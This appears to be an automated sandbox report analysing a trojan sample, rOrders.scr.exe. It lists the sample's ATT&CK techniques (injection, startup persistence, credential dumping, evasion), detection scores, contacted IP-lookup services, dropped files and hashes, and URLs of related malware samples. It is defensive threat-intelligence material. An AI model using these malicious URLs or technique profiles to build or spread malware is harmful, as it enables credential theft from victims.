Source: Yara match	File source: Process Memory Space: rOrders.scr.exe PID: 1848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rOrders.scr.exe PID: 4760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 6444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 00.exe PID: 7192, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	12 Registry Run Keys / Startup Folder	11 Process Injection	3 Obfuscated Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	111 Security Software Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rOrders.scr.exe	56%	Virustotal		Browse
rOrders.scr.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
rOrders.scr.exe	100%	Avira	HEUR/AGEN.1309847
rOrders.scr.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	100%	Avira	HEUR/AGEN.1309847
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.comP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.32.1	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://g.live.com/odclientsettings/Prod/C:	edb.log.5.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2092923724.000000000617A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.comP	00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2219165054.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2227771780.000000000793D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2219165054.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2227771780.000000000793D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	rOrders.scr.exe, 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2092923724.000000000617A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E5F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2225810987.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000005.00000002.3709232535.000002A0CFE00000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000005.00000003.2088950532.000002A0CFCC0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	false		high
http://checkip.dyndns.org	rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.	powershell.exe, 00000002.00000002.2096916551.0000000007C63000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2089846660.0000000005111000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2219165054.0000000004F81000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBsq	powershell.exe, 00000002.00000002.2089846660.0000000005111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2219165054.0000000004F81000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2219165054.00000000050D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2227771780.000000000793D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	rOrders.scr.exe, 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D68000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.32.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590011
Start date and time:	2025-01-13 13:30:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	rOrders.scr.exe
Detection:	MAL
Classification:	mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@2/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 270 Number of non-executed functions: 36
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 2.19.106.160, 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1520 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2608 because it is empty
Execution Graph export aborted for target rOrders.scr.exe, PID 4760 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:31:10	API Interceptor	9x Sleep call for process: powershell.exe modified
07:31:11	API Interceptor	3x Sleep call for process: svchost.exe modified
07:31:14	API Interceptor	7762641x Sleep call for process: rOrders.scr.exe modified
07:31:28	API Interceptor	6630996x Sleep call for process: 00.exe modified
13:31:14	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.32.1	24010-KAPSON.exe	Get hash	malicious	Azorult, GuLoader	Browse	b2csa.icu/PL341/index.php
	bIcqeSVPW6.exe	Get hash	malicious	FormBook	Browse	www.rafconstrutora.online/sa6l/
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	www.aziziyeescortg.xyz/2pcx/
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	www.masterqq.pro/3vdc/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	redroomaudio.com/administrator/index.php
132.226.247.73	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
checkip.dyndns.com	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UTMEMUS	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
CLOUDFLARENETUS	NursultanAlphaCrack.bat.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.80.1
	recode.exe	Get hash	malicious	HTMLPhisher	Browse	104.21.16.1
	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	RFQ PC25-1301 Product Specifications_PDF.exe	Get hash	malicious	FormBook	Browse	104.21.80.156
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	https://shortener.kountryboyzbailbonds.com/orVbdaZDUTFihPy?https://go.microsoft.com/ref=?ONSKE6784f8047cd90___store=ot&url=ONSKE6784f8047cd90&utm_source=follow-up-email&utm_medium=email&utm_campaign=abandoned%20helpful%20link	Get hash	malicious	Unknown	Browse	104.19.132.76
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	https://smartbooking.ma/	Get hash	malicious	Unknown	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	MB263350411AE.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	QUOTATION REQUIRED_Enatel s.r.l..bat.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	Remittance Advice.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	SOA.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	PDF-3093900299039 pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	Unknown	Browse	104.21.32.1

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3588072191296206
Encrypted:	false
SSDEEP:	6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
MD5:	663C5D6018506231E334FB3EA962ED1C
SHA1:	539A4641CE92E57E4ADEE32750A817326E596D4C
SHA-256:	066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
SHA-512:	5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8337326629516084
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugQ:gJjJGtpTq2yv1AuNZRY3diu8iBVqFO
MD5:	71A7E48DC1F9565530C6074FE69FE1FD
SHA1:	7B6551D21E68078BBA31CEA522AF8C7D99C89886
SHA-256:	B00F01505A37520CF11E359D53E55B05B7E34529C143638423BED0D91DDF81BB
SHA-512:	7D1150B537A33F1469BE948C8302403DE092D8305BF66ABA9AC552E81D483A92E7001AF5FE0733FE3C2457DF21DF94437C34F3336BB64B569C1F554A4FBC3D43
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x72b9a452, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.658460125101143
Encrypted:	false
SSDEEP:	1536:JSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Jaza6xhzA2U8HDnAPZ4PZf9h/9h
MD5:	EBAD2B3FBE6379B83E16B97F3DC26F4E
SHA1:	8623F446EBD653DD71AB593EA6F5C1D70350C0C6
SHA-256:	46DAC50632A2A49F76989911E8AAA86CB2D8AE6D3D9E35B0FF193BF9E5DD5525
SHA-512:	38F26319019DCB440DCAEBB222C133EF68C88234B02A47B4AD4D8638FBABDBDABD31259B03B87D3264DE3B05154AB19F8211C36007AA654F167DD4B8BBBE6595
Malicious:	false
Preview:	r..R... ...............X\...;...{......................T.~......"...}%......}..h.\|......"...}%.T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{.....................................C."...}%.................2.'.."...}%..........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

